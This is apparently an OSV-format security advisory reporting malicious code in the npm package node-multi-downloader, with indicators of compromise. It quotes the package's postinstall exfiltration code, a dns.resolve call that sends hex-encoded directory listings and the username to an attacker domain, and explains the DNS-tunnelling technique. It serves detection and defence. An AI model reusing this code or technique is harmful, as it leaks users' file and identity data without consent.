{"id":"MAL-2026-5735","summary":"Malicious code in node-multi-downloader (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (8fc720cd970f4d19212ca90945b7fc1e4e1c64da98235ff595b3792ae69e3e68)\nOn `npm install`, this package's postinstall hook (`node index.js`) hex-encodes the installer's current working directory, the first 15 entries of that directory, and `os.userInfo().username`, and leaks each chunk via DNS A-record lookups to subdomains of the attacker-controlled domain `uqlyosvp1f9.oob.evilsec.xyz`. The hardcoded out-of-band domain is bound at index.js line 1 (`const D = \"uqlyosvp1f9.oob.evilsec.xyz\"`) and index.js line 8 calls `dns.resolve(`${chunk}.${tag}${i}.${D}`, 'A',...)` to transmit the encoded data. DNS-subdomain encoding is a well-known technique to evade HTTP egress filtering. The package metadata (description \"RSI package!\", anonymous author, release-candidate version) provides no legitimate purpose that would justify reading installer filesystem and identity at install time.\n","modified":"2026-06-13T07:31:42.256186039Z","published":"2026-06-13T07:04:03Z","database_specific":{"malicious-packages-origins":[{"versions":["5.0.14-rc.3"],"modified_time":"2026-06-13T07:04:03Z","import_time":"2026-06-13T07:25:39.73129435Z","sha256":"77464387879005e5c35e332c1b9f9826ea1af7dec30cad7d06fe1023d553f1f4","source":"amazon-inspector","id":"IN-MAL-2026-006322"},{"versions":["5.0.14-rc.3"],"sha256":"8fc720cd970f4d19212ca90945b7fc1e4e1c64da98235ff595b3792ae69e3e68","import_time":"2026-06-13T07:25:39.675878525Z","modified_time":"2026-06-13T07:04:03Z","source":"amazon-inspector","id":"IN-MAL-2026-006321"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/node-multi-downloader/v/5.0.14-rc.3"}],"affected":[{"package":{"name":"node-multi-downloader","ecosystem":"npm","purl":"pkg:npm/node-multi-downloader"},"versions":["5.0.14-rc.3"],"database_specific":{"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"indicators":{"ips":["104.16.8.34","10.1.0.2"],"package_integrity":[{"hashes":{"sha1":"def4f059880087a00597558d8862a4171c2851b5","sha512_sri":"sha512-nRN1LlwWX0jlka6fweawaXGmfEE0UNh/zzNKCzmLEs4NdSRQKZCWVMpgL45REz8KEF1t25Pd09ZmlL4Ld0VQqg=="},"filename":"node-multi-downloader-5.0.14-rc.3.tgz"}],"domains":["2e6e706d2c6e6f64655f6d6f64756c65732c7061636b6167652d6c6f636b2e.fil0.uqlyosvp1f9.oob.evilsec.xyz","6a736f6e2c7061636b6167652e6a736f6e.fil1.uqlyosvp1f9.oob.evilsec.xyz","6c74692d646f776e6c6f61646572.cwd1.uqlyosvp1f9.oob.evilsec.xyz","696e6465782e6a732c7061636b6167652e6a736f6e.fil0.uqlyosvp1f9.oob.evilsec.xyz","7363616e.usr0.uqlyosvp1f9.oob.evilsec.xyz","2f686f6d652f7363616e.cwd0.uqlyosvp1f9.oob.evilsec.xyz"],"evidence_files":[{"tlsh":"01f050f923f5a1f494666480c1b48d0a2273cb121173c090b81d68d6abd38f4bbe6971","sha256":"3a87bc4174ea8f94807555d6841cfd778d5c6aa796a66a5ea78a2ae3721de89f","path":"index.js"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/node-multi-downloader/MAL-2026-5735.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}